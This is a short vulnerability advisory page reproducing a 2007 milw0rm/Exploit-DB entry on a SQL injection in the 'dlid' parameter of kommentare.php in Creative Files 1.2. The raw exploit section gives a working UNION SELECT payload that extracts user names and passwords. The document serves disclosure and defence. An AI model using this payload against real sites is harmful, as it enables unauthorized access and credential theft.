Vendor: Creative Files
By: xoron
CVSS: 5.5 (MEDIUM)
Type: Remote SQL Injection
CWE: 89
Product Name: Creative Files
Affected Version From: 1.2
Affected Version To: 1.2
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Creative Files 1.2 Remote SQL Injection Vulnerabilities

The vulnerability exists in the kommentare.php file of Creative Files 1.2. By manipulating the 'dlid' parameter, an attacker can execute arbitrary SQL queries, potentially leading to unauthorized access or data leakage.

Mitigation:

The vendor should sanitize user input and use prepared statements or parameterized queries to prevent SQL injection attacks. Users should update to a patched version of the software.
Source

Exploit-DB raw data:

======================X=O=R=O=N=====================
+
+ Creative Files 1.2 (kommentare.php)  Remote SQL Injection Vulnerabilities
+
======================X=O=R=O=N=====================
+
+ Found by: xoron
+
+ xoron.biz
+
======================X=O=R=O=N=====================
+
+ SQL INJ:
+
+ kommentare.php?dlid=-1/**/UNION/**/SELECT/**/null,null,null,name,null,PASSWORD,null/**/FROM/**/user/*
+
======================X=O=R=O=N=====================
+
+ Vendor site: http://www.thecreativeheads.de/CreativeFiles/downloads.php
+
======================X=O=R=O=N=====================
+
+ Thnx: pang0, unique
+
======================X=O=R=O=N=====================

# milw0rm.com [2007-03-16]